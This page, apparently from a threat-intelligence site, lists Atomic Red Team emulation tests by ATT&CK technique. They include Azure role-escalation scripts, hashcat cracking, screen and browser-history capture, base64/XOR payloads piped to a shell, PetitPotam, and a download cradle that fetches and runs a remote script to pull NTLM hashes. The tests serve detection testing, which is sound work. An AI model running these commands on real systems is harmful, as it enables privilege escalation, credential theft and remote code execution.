if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
$role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
if ($role -eq $null) { Write-Warning "Role not found"; exit }
Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.ObjectId
Write-Host "Service Principal $($sp.DisplayName) was added to $($role.DisplayName)"

powershelliaas:azureAzure - adding user to Azure role in subscription

Import-Module -Name Az.Resources
$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
Connect-AzAccount -Credential $Credential

$user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
if ($user -eq $null) { Write-Warning "User not found"; exit }
$subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
$role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"}
if ($role -eq $null) { Write-Warning "Role not found"; exit }

New-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
Write-Host "User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)"

powershelliaas:azureAzure - adding service principal to Azure role in subscription

Import-Module -Name Az.Resources
$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
Connect-AzAccount -Credential $Credential

$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"}
if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
$subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"} 
if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
$role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"}
if ($role -eq $null) { Write-Warning "Role not found"; exit }

New-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
Write-Host "Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)"

powershellazure-adAzure AD - adding permission to application

Import-Module -Name AzureAD
$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
Connect-AzureAD -Credential $Credential

$aadApplication = New-AzureADApplication -DisplayName "#{application_name}"
$servicePrincipal = New-AzureADServicePrincipal -AppId $aadApplication.AppId
#$aadApplication = Get-AzureADApplication -Filter "DisplayName eq '#{application_name}'"

#Get Service Principal of Microsoft Graph Resource API 
$graphSP = Get-AzureADServicePrincipal -Filter "DisplayName eq 'Microsoft Graph'"

#Initialize RequiredResourceAccess for Microsoft Graph Resource API 
$requiredGraphAccess = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess
$requiredGraphAccess.ResourceAppId = $graphSP.AppId
$requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess]

#Set Application Permissions
$ApplicationPermissions = @('#{application_permission}')

$reqPermission = $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions}
if($reqPermission)
{
$resourceAccess = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess
$resourceAccess.Type = "Role"
$resourceAccess.Id = $reqPermission.Id    
#Add required app permission
$requiredGraphAccess.ResourceAccess.Add($resourceAccess)
}
else
{
Write-Host "App permission $permission not found in the Graph Resource API" -ForegroundColor Red
}

#Add required resource accesses
$requiredResourcesAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess]
$requiredResourcesAccess.Add($requiredGraphAccess)

#Set permissions in existing Azure AD App
Set-AzureADApplication -ObjectId $aadApplication.ObjectId -RequiredResourceAccess $requiredResourcesAccess

$servicePrincipal = Get-AzureADServicePrincipal -Filter "AppId eq '$($aadApplication.AppId)'"

New-AzureADServiceAppRoleAssignment -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId -ResourceId $graphSP.ObjectId -Id $reqPermission.Id

command_promptelevatedwindowsPassword Change on Directory Service Restore Mode (DSRM) Account

ntdsutil "set dsrm password" "sync from domain account #{sync_account}" "q" "q"

powershellwindowsDomain Password Policy Check: Short Password

$credFile = "#{cred_file}"
if (Test-Path $credFile) {
    $cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $env:USERNAME, (Get-Content $credFile | ConvertTo-SecureString)
    if($cred.GetNetworkCredential().Password -eq "#{new_password}"){
      Write-Host -ForegroundColor Yellow "The new password is the same as the password stored in the credential file. Please specify a different new password."; exit -1
    }
    try {
        $newPassword = ConvertTo-SecureString #{new_password} -AsPlainText -Force
        Set-ADAccountPassword -Identity $env:USERNAME -OldPassword $cred.password -NewPassword $newPassword
    }
    catch { 
        $_.Exception
        $errCode = $_.Exception.ErrorCode
        Write-Host "Error code: $errCode"
        if ($errCode -eq 86) {
            Write-Host -ForegroundColor Yellow "The stored password for the current user is incorrect. Please run the prereq commands to set the correct credentials"
            Remove-Item $credFile
        }
        exit $errCode
    }
    Write-Host -ForegroundColor Cyan "Successfully changed the password to #{new_password}"
    $newCred = New-Object System.Management.Automation.PSCredential ($env:USERNAME, $(ConvertTo-SecureString "#{new_password}" -AsPlainText -Force))
    $newCred.Password | ConvertFrom-SecureString | Out-File $credFile
}
else {
    Write-Host -ForegroundColor Yellow "You must store the password of the current user by running the prerequisite commands first"
}

powershellwindowsDomain Password Policy Check: No Number in Password

$credFile = "#{cred_file}"
if (Test-Path $credFile) {
    $cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $env:USERNAME, (Get-Content $credFile | ConvertTo-SecureString)
    if($cred.GetNetworkCredential().Password -eq "#{new_password}"){
      Write-Host -ForegroundColor Yellow "The new password is the same as the password stored in the credential file. Please specify a different new password."; exit -1
    }
    try {
        $newPassword = ConvertTo-SecureString #{new_password} -AsPlainText -Force
        Set-ADAccountPassword -Identity $env:USERNAME -OldPassword $cred.password -NewPassword $newPassword
    }
    catch { 
        $_.Exception
        $errCode = $_.Exception.ErrorCode
        Write-Host "Error code: $errCode"
        if ($errCode -eq 86) {
            Write-Host -ForegroundColor Yellow "The stored password for the current user is incorrect. Please run the prereq commands to set the correct credentials"
            Remove-Item $credFile
        }
        exit $errCode
    }
    Write-Host -ForegroundColor Cyan "Successfully changed the password to #{new_password}"
    $newCred = New-Object System.Management.Automation.PSCredential ($env:USERNAME, $(ConvertTo-SecureString "#{new_password}" -AsPlainText -Force))
    $newCred.Password | ConvertFrom-SecureString | Out-File $credFile
}
else {
    Write-Host -ForegroundColor Yellow "You must store the password of the current user by running the prerequisite commands first"
}

powershellwindowsDomain Password Policy Check: No Special Character in Password

$credFile = "#{cred_file}"
if (Test-Path $credFile) {
    $cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $env:USERNAME, (Get-Content $credFile | ConvertTo-SecureString)
    if($cred.GetNetworkCredential().Password -eq "#{new_password}"){
      Write-Host -ForegroundColor Yellow "The new password is the same as the password stored in the credential file. Please specify a different new password."; exit -1
    }
    try {
        $newPassword = ConvertTo-SecureString #{new_password} -AsPlainText -Force
        Set-ADAccountPassword -Identity $env:USERNAME -OldPassword $cred.password -NewPassword $newPassword
    }
    catch { 
        $_.Exception
        $errCode = $_.Exception.ErrorCode
        Write-Host "Error code: $errCode"
        if ($errCode -eq 86) {
            Write-Host -ForegroundColor Yellow "The stored password for the current user is incorrect. Please run the prereq commands to set the correct credentials"
            Remove-Item $credFile
        }
        exit $errCode
    }
    Write-Host -ForegroundColor Cyan "Successfully changed the password to #{new_password}"
    $newCred = New-Object System.Management.Automation.PSCredential ($env:USERNAME, $(ConvertTo-SecureString "#{new_password}" -AsPlainText -Force))
    $newCred.Password | ConvertFrom-SecureString | Out-File $credFile
}
else {
    Write-Host -ForegroundColor Yellow "You must store the password of the current user by running the prerequisite commands first"
}

powershellwindowsDomain Password Policy Check: No Uppercase Character in Password

$credFile = "#{cred_file}"
if (Test-Path $credFile) {
    $cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $env:USERNAME, (Get-Content $credFile | ConvertTo-SecureString)
    if($cred.GetNetworkCredential().Password -eq "#{new_password}"){
      Write-Host -ForegroundColor Yellow "The new password is the same as the password stored in the credential file. Please specify a different new password."; exit -1
    }
    try {
        $newPassword = ConvertTo-SecureString #{new_password} -AsPlainText -Force
        Set-ADAccountPassword -Identity $env:USERNAME -OldPassword $cred.password -NewPassword $newPassword
    }
    catch { 
        $_.Exception
        $errCode = $_.Exception.ErrorCode
        Write-Host "Error code: $errCode"
        if ($errCode -eq 86) {
            Write-Host -ForegroundColor Yellow "The stored password for the current user is incorrect. Please run the prereq commands to set the correct credentials"
            Remove-Item $credFile
        }
        exit $errCode
    }
    Write-Host -ForegroundColor Cyan "Successfully changed the password to #{new_password}"
    $newCred = New-Object System.Management.Automation.PSCredential ($env:USERNAME, $(ConvertTo-SecureString "#{new_password}" -AsPlainText -Force))
    $newCred.Password | ConvertFrom-SecureString | Out-File $credFile
}
else {
    Write-Host -ForegroundColor Yellow "You must store the password of the current user by running the prerequisite commands first"
}

powershellwindowsDomain Password Policy Check: No Lowercase Character in Password

$credFile = "#{cred_file}"
if (Test-Path $credFile) {
    $cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $env:USERNAME, (Get-Content $credFile | ConvertTo-SecureString)
    if($cred.GetNetworkCredential().Password -eq "#{new_password}"){
      Write-Host -ForegroundColor Yellow "The new password is the same as the password stored in the credential file. Please specify a different new password."; exit -1
    }
    try {
        $newPassword = ConvertTo-SecureString #{new_password} -AsPlainText -Force
        Set-ADAccountPassword -Identity $env:USERNAME -OldPassword $cred.password -NewPassword $newPassword
    }
    catch { 
        $_.Exception
        $errCode = $_.Exception.ErrorCode
        Write-Host "Error code: $errCode"
        if ($errCode -eq 86) {
            Write-Host -ForegroundColor Yellow "The stored password for the current user is incorrect. Please run the prereq commands to set the correct credentials"
            Remove-Item $credFile
        }
        exit $errCode
    }
    Write-Host -ForegroundColor Cyan "Successfully changed the password to #{new_password}"
    $newCred = New-Object System.Management.Automation.PSCredential ($env:USERNAME, $(ConvertTo-SecureString "#{new_password}" -AsPlainText -Force))
    $newCred.Password | ConvertFrom-SecureString | Out-File $credFile
}
else {
    Write-Host -ForegroundColor Yellow "You must store the password of the current user by running the prerequisite commands first"
}

powershellwindowsDomain Password Policy Check: Only Two Character Classes

$credFile = "#{cred_file}"
if (Test-Path $credFile) {
    $cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $env:USERNAME, (Get-Content $credFile | ConvertTo-SecureString)
    if($cred.GetNetworkCredential().Password -eq "#{new_password}"){
      Write-Host -ForegroundColor Yellow "The new password is the same as the password stored in the credential file. Please specify a different new password."; exit -1
    }
    try {
        $newPassword = ConvertTo-SecureString #{new_password} -AsPlainText -Force
        Set-ADAccountPassword -Identity $env:USERNAME -OldPassword $cred.password -NewPassword $newPassword
    }
    catch { 
        $_.Exception
        $errCode = $_.Exception.ErrorCode
        Write-Host "Error code: $errCode"
        if ($errCode -eq 86) {
            Write-Host -ForegroundColor Yellow "The stored password for the current user is incorrect. Please run the prereq commands to set the correct credentials"
            Remove-Item $credFile
        }
        exit $errCode
    }
    Write-Host -ForegroundColor Cyan "Successfully changed the password to #{new_password}"
    $newCred = New-Object System.Management.Automation.PSCredential ($env:USERNAME, $(ConvertTo-SecureString "#{new_password}" -AsPlainText -Force))
    $newCred.Password | ConvertFrom-SecureString | Out-File $credFile
}
else {
    Write-Host -ForegroundColor Yellow "You must store the password of the current user by running the prerequisite commands first"
}

powershellwindowsDomain Password Policy Check: Common Password Use

$credFile = "#{cred_file}"
if (Test-Path $credFile) {
    $cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $env:USERNAME, (Get-Content $credFile | ConvertTo-SecureString)
    if($cred.GetNetworkCredential().Password -eq "#{new_password}"){
      Write-Host -ForegroundColor Yellow "The new password is the same as the password stored in the credential file. Please specify a different new password."; exit -1
    }
    try {
        $newPassword = ConvertTo-SecureString #{new_password} -AsPlainText -Force
        Set-ADAccountPassword -Identity $env:USERNAME -OldPassword $cred.password -NewPassword $newPassword
    }
    catch { 
        $_.Exception
        $errCode = $_.Exception.ErrorCode
        Write-Host "Error code: $errCode"
        if ($errCode -eq 86) {
            Write-Host -ForegroundColor Yellow "The stored password for the current user is incorrect. Please run the prereq commands to set the correct credentials"
            Remove-Item $credFile
        }
        exit $errCode
    }
    Write-Host -ForegroundColor Cyan "Successfully changed the password to #{new_password}"
    $newCred = New-Object System.Management.Automation.PSCredential ($env:USERNAME, $(ConvertTo-SecureString "#{new_password}" -AsPlainText -Force))
    $newCred.Password | ConvertFrom-SecureString | Out-File $credFile
}
else {
    Write-Host -ForegroundColor Yellow "You must store the password of the current user by running the prerequisite commands first"
}

shiaas:gcpGCP - Delete Service Account Key

gcloud config set project #{project_id}
KEY=`gcloud iam service-accounts keys list --iam-account=#{service_name}@#{project_id}.iam.gserviceaccount.com --format="value(KEY_ID)" --limit=1`
gcloud iam service-accounts keys delete $KEY --iam-account=#{service_name}@#{project_id}.iam.gserviceaccount.com --quiet

T1110.002 Password Cracking · 1 test

command_promptelevatedwindowsPassword Cracking with Hashcat

cd #{hashcat_exe}\..
#{hashcat_exe} -a 0 -m 1000 -r .\rules\Incisive-leetspeak.rule #{input_file_sam} #{input_file_passwords}

T1113 Screen Capture · 10 tests

bashmacosScreencapture

screencapture #{output_file}

bashmacosScreencapture (silent)

screencapture -x #{output_file}

bashlinuxX Windows Capture

xwd -root -out #{output_file}
xwud -in #{output_file}

shlinuxX Windows Capture (freebsd)

xwd -root -out #{output_file}
xwud -in #{output_file}

bashlinuxCapture Linux Desktop using Import Tool

import -window root #{output_file}

shlinuxCapture Linux Desktop using Import Tool (freebsd)

import -window root #{output_file}

powershellwindowsWindows Screencapture

cmd /c start /b psr.exe /start /output #{output_file} /sc 1 /gui 0 /stopevent 12
Add-Type -MemberDefinition '[DllImport("user32.dll")] public static extern void mouse_event(int flags, int dx, int dy, int cButtons, int info);' -Name U32 -Namespace W;
[W.U32]::mouse_event(0x02 -bor 0x04 -bor 0x01, 0, 0, 0, 0);
cmd /c "timeout #{recording_time} > NULL && psr.exe /stop"

powershellwindowsWindows Screen Capture (CopyFromScreen)

Add-Type -AssemblyName System.Windows.Forms
$screen = [Windows.Forms.SystemInformation]::VirtualScreen
$bitmap = New-Object Drawing.Bitmap $screen.Width, $screen.Height
$graphic = [Drawing.Graphics]::FromImage($bitmap)
$graphic.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bitmap.Size)
$bitmap.Save("#{output_file}")

powershellelevatedwindowsWindows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted

reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI" /v DisableAIDataAnalysis /t REG_DWORD /d 0 /f
reg delete "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\WindowsAI" /v DisableAIDataAnalysis /f

powershellwindowsRDP Bitmap Cache Extraction via bmc-tools

$url = 'https://raw.githubusercontent.com/ANSSI-FR/bmc-tools/master/bmc-tools.py'
$toolsDir = "$env:TEMP\bmc-tools.py"
 
# create output directory
New-Item -ItemType Directory -Path #{output_dir} -Force | Out-Null

# python script download
& curl.exe -L $url --output $toolsDir
 
# execution step
if (Test-Path $toolsDir) { python $toolsDir -s "#{cache_path}" -d #{output_dir} -b }

T1119 Automated Collection · 4 tests

command_promptwindowsAutomated Collection Command Prompt

mkdir %temp%\T1119_command_prompt_collection >nul 2>&1
dir c: /b /s .docx | findstr /e .docx
for /R c:\ %f in (*.docx) do copy /Y %f %temp%\T1119_command_prompt_collection

powershellwindowsAutomated Collection PowerShell

New-Item -Path $env:TEMP\T1119_powershell_collection -ItemType Directory -Force | Out-Null
Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination $env:TEMP\T1119_powershell_collection}

powershellwindowsRecon information for export with PowerShell

Get-Service > $env:TEMP\T1119_1.txt
Get-ChildItem Env: > $env:TEMP\T1119_2.txt
Get-Process > $env:TEMP\T1119_3.txt

command_promptwindowsRecon information for export with Command Prompt

sc query type=service > %TEMP%\T1119_1.txt
doskey /history > %TEMP%\T1119_2.txt
wmic process list > %TEMP%\T1119_3.txt
tree C:\AtomicRedTeam\atomics > %TEMP%\T1119_4.txt

T1129 Shared Modules · 1 test

command_promptwindowsESXi - Install a custom VIB on an ESXi host

#{pscp_file} -pw #{vm_pass} #{vib_file} #{vm_user}@#{vm_host}:/tmp
echo "" | "#{plink_file}" "#{vm_host}" -ssh  -l "#{vm_user}" -pw "#{vm_pass}" -m "#{vib_install}"

T1140 Deobfuscate/Decode Files or Information · 11 tests

command_promptwindowsDeobfuscate/Decode Files Or Information

certutil -encode #{executable} %temp%\T1140_calc.txt
certutil -decode %temp%\T1140_calc.txt %temp%\T1140_calc_decoded.exe

command_promptwindowsCertutil Rename and Decode

copy %windir%\system32\certutil.exe %temp%\tcm.tmp
%temp%\tcm.tmp -encode #{executable} %temp%\T1140_calc2.txt
%temp%\tcm.tmp -decode %temp%\T1140_calc2.txt %temp%\T1140_calc2_decoded.exe

shlinux, macosBase64 decoding with Python

ENCODED=$(python3 -c 'import base64;enc=base64.b64encode("#{message}".encode());print(enc.decode())')
python3 -c "import base64;dec=base64.b64decode(\"$ENCODED\");print(dec.decode())"
python3 -c "import base64 as d;dec=d.b64decode(\"$ENCODED\");print(dec.decode())"
python3 -c "from base64 import b64decode;dec=b64decode(\"$ENCODED\");print(dec.decode())"
python3 -c "from base64 import b64decode as d;dec=d(\"$ENCODED\");print(dec.decode())"
echo $ENCODED | python3 -c "import base64,sys;dec=base64.b64decode(sys.stdin.read());print(dec.decode())"
echo $ENCODED > #{encoded_file} && python3 -c "import base64;dec=base64.b64decode(open('#{encoded_file}').read());print(dec.decode())"

shlinux, macosBase64 decoding with Perl

ENCODED=$(perl -e "use MIME::Base64;print(encode_base64('#{message}'));")
perl -le "use MIME::Base64;print(decode_base64('$ENCODED'));"
echo $ENCODED | perl -le 'use MIME::Base64;print(decode_base64(<STDIN>));'
echo $ENCODED > #{encoded_file} && perl -le 'use MIME::Base64;open($f,"<","#{encoded_file}");print(decode_base64(<$f>));'

shlinux, macosBase64 decoding with shell utilities

ENCODED=$(echo '#{message}' | base64)
printf $ENCODED | base64 -d
echo $ENCODED | base64 -d
echo $(echo $ENCODED) | base64 -d
echo $ENCODED > #{encoded_file} && base64 -d #{encoded_file}
echo $ENCODED > #{encoded_file} && base64 -d < #{encoded_file}
echo $ENCODED > #{encoded_file} && cat #{encoded_file} | base64 -d
echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | base64 -d
bash -c "{echo,\"$(echo $ENCODED)\"}|{base64,-d}"

shlinuxBase64 decoding with shell utilities (freebsd)

ENCODED=$(echo '#{message}' | b64encode -r -)
printf $ENCODED | b64decode -r
echo $ENCODED | b64decode -r
echo $(echo $ENCODED) | b64decode -r
echo $ENCODED > #{encoded_file} && b64encode -r #{encoded_file}
echo $ENCODED > #{encoded_file} && b64decode -r < #{encoded_file}
echo $ENCODED > #{encoded_file} && cat #{encoded_file} | b64decode -r
echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | b64decode -r

shlinuxFreeBSD b64encode Shebang in CLI

echo #{bash_encoded} | b64decode -r | sh
echo #{dash_encoded} | b64decode -r | sh
echo #{fish_encoded} | b64decode -r | sh
echo #{sh_encoded} | b64decode -r | sh

shlinux, macosHex decoding with shell utilities

ENCODED=$(echo '#{message}' | xxd -ps -c 256)
printf $ENCODED | xxd -r -p
echo $ENCODED | xxd -r -p
echo $(echo $ENCODED) | xxd -r -p
echo $ENCODED > #{encoded_file} && xxd -r -p #{encoded_file}
echo $ENCODED > #{encoded_file} && xxd -r -p < #{encoded_file}
echo $ENCODED > #{encoded_file} && cat #{encoded_file} | xxd -r -p
echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | xxd -r -p

shlinux, macosLinux Base64 Encoded Shebang in CLI

echo #{bash_encoded} | base64 -d | bash
echo #{dash_encoded} | base64 -d | bash
echo #{fish_encoded} | base64 -d | bash
echo #{sh_encoded} | base64 -d | bash

bashlinux, macosXOR decoding and command execution using Python

python3 -c 'import base64; import subprocess; xor_decrypt = lambda text, key: "".join([chr(c ^ ord(k)) for c, k in zip(base64.b64decode(text.encode()), key)]); command = "#{encrypted_command}"; key = "#{xor_key}"; exec = xor_decrypt(command, key); subprocess.call(exec, shell=True)'

command_promptwindowsExpand CAB with expand.exe

mkdir "#{output_dir}" >nul 2>&1
echo hello from atomic red team > "PathToAtomicsFolder\T1140\src\art-expand-source.txt"
makecab "PathToAtomicsFolder\T1140\src\art-expand-source.txt" "#{cab_path}"
pushd "#{output_dir}"
expand "#{cab_path}" -F:* .
popd

T1187 Forced Authentication · 3 tests

powershellwindowsPetitPotam

& "#{petitpotam_path}" #{captureServerIP} #{targetServerIP} #{efsApi}
Write-Host "End of PetitPotam attack"

powershellwindowsWinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Internalmonologue.ps1')
Invoke-Internalmonologue -command "-Downgrade true -impersonate true -restore true"

powershellwindowsTrigger an authenticated RPC call to a target server with no Sign flag set

rpcping -s #{server_ip} -e #{custom_port} /a connect /u NTLM 1>$Null

T1217 Browser Information Discovery · 11 tests

shlinuxList Mozilla Firefox Bookmark Database Files on FreeBSD/Linux

find / -path "*.mozilla/firefox/*/places.sqlite" 2>/dev/null -exec echo {} >> #{output_file} \;
cat #{output_file} 2>/dev/null

shmacosList Mozilla Firefox Bookmark Database Files on macOS

find / -path "*/Firefox/Profiles/*/places.sqlite" -exec echo {} >> #{output_file} \;
cat #{output_file} 2>/dev/null

shmacosList Google Chrome Bookmark JSON Files on macOS

find / -path "*/Google/Chrome/*/Bookmarks" -exec echo {} >> #{output_file} \;
cat #{output_file} 2>/dev/null

shlinuxList Google Chromium Bookmark JSON Files on FreeBSD

find / -path "*/.config/chromium/*/Bookmarks" -exec echo {} >> #{output_file} \;
cat #{output_file} 2>/dev/null

powershellwindowsList Google Chrome / Opera Bookmarks on Windows with powershell

Get-ChildItem -Path C:\Users\ -Filter Bookmarks -Recurse -ErrorAction SilentlyContinue -Force

command_promptwindowsList Google Chrome / Edge Chromium Bookmarks on Windows with command prompt

where /R C:\Users\ Bookmarks

command_promptwindowsList Mozilla Firefox bookmarks on Windows with command prompt

where /R C:\Users\ places.sqlite

command_promptwindowsList Internet Explorer Bookmarks using the command prompt

dir /s /b %USERPROFILE%\Favorites

shmacosList Safari Bookmarks on MacOS

find / -path "*/Safari/Bookmarks.plist" 2>/dev/null >> #{output_file} 
cat #{output_file}

powershellelevatedwindowsExtract Edge Browsing History

$URL_Regex = '(htt(p|s))://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
$History = Get-Content -Path "#{history_path}" | Select-String -AllMatches $URL_Regex | ForEach-Object { $_.Matches.Value } | Sort -Unique
$History | Out-File -FilePath "#{dest_path}"

powershellelevatedwindowsExtract chrome Browsing History

$Username = (whoami).Split('\')[1]
$URL_Regex = '(htt(p|s))://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
$History = Get-Content -Path "$Env:systemdrive\Users\$UserName\AppData\Local\Google\Chrome\User Data\Default\History" | Select-String -AllMatches $URL_Regex | ForEach-Object { $_.Matches.Value } | Sort -Unique
$History | Out-File -FilePath "$Env:USERPROFILE\Downloads\chromebrowsinghistory.txt"

▶

Tools Used

0 mapped

Other tooling / TTPs (curation, not ATT&CK-mapped):

MOXIE MARLINSPIKE APRIL 2021 UFED VULNERABILITY DISCLOSURESERBIA NOVISPY SPYWARE COORDINATION AMNESTY INTERNATIONAL 2024SIM CARD SD CARD EXTRACTIONSUN CORPORATION JAPANESE PARENT 45 PERCENT OWNERSHIP

Intelligence Graph · click any node to traverse

CVETechnique ActorTool Family

drag to reposition · click any node to traverse · button top-right enlarges

External lookups - second-class, for what we don’t hold ourselves

MITRE search Malpedia Google

Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities

Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs

Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures

Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1

About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service

threatengine.sh · Open-source threat intelligence platform · 100+ authoritative sources · Every fact traces to its origin

Cellebrite